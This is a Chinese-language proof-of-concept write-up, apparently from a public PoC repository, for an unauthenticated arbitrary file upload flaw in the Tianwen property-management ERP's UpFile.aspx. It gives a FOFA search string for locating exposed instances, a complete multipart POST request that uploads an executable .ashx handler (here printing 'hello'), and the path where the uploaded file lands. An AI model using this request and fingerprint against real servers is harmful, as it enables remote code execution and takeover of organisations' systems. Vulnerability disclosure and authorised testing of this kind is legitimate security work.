POC/wpoc/天问物业ERP/天问物业ERP系统UpFile.aspx前台任意文件上传漏洞.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

62 lines
1.9 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 天问物业ERP系统UpFile.aspx前台任意文件上传漏洞
# 一、漏洞简介
成都天问互联科技有限公司以软件开发和技术服务为基础建立物业ERP应用系统向物管公司提供旨在降低成本、保障品质、提升效能为目标的智慧物管整体解决方案。天问物业ERP系统UpFile.aspx存在文件上传漏洞攻击者可以利用漏洞上传恶意文件获取服务器权限。
# 二、影响版本
+ 天问物业ERP
# 三、资产测绘
+ fofa`body="国家版权局软著登字第1205328号"`
+ 登录页面
![1693186922915-1f51f82b-7763-45ed-a0a0-77d42bbe6c25.png](./img/_FtyxihXp3rud9CH/1693186922915-1f51f82b-7763-45ed-a0a0-77d42bbe6c25-373502.png)
# 四、漏洞复现
```plain
POST /HM/M_Main/UpLoad/UpFile.aspx HTTP/1.1
Content-Type: multipart/form-data; boundary=00content0boundary00
User-Agent: Java/1.8.0_381
Host: xx.xx.xx.xx
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 487
Connection: close
--00content0boundary00
Content-Disposition: form-data; name="UpFileData"; filename="1.ashx"
<% @ webhandler language="C#" class="AverageHandler" %>
using System;
using System.Web;
public class AverageHandler : IHttpHandler
{
public bool IsReusable
{
get {
return true;
}
}
public void ProcessRequest(HttpContext ctx)
{
ctx.Response.Write("hello");
}
}
--00content0boundary00--
```
![1693187626139-0df6a426-9972-4c38-a24c-9171d529de33.png](./img/_FtyxihXp3rud9CH/1693187626139-0df6a426-9972-4c38-a24c-9171d529de33-838752.png)
上传文件位置
```plain
http://xx.xx.xx.xx/UpLoadFile//Sys_HeaderImage/2023/08/493216795627.ashx
```
![1693187670717-7b037f1f-9a4b-4c70-928a-a580716b4480.png](./img/_FtyxihXp3rud9CH/1693187670717-7b037f1f-9a4b-4c70-928a-a580716b4480-501028.png)
> 更新: 2024-02-29 23:55:51
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/tw7n0fcma3hvp61o>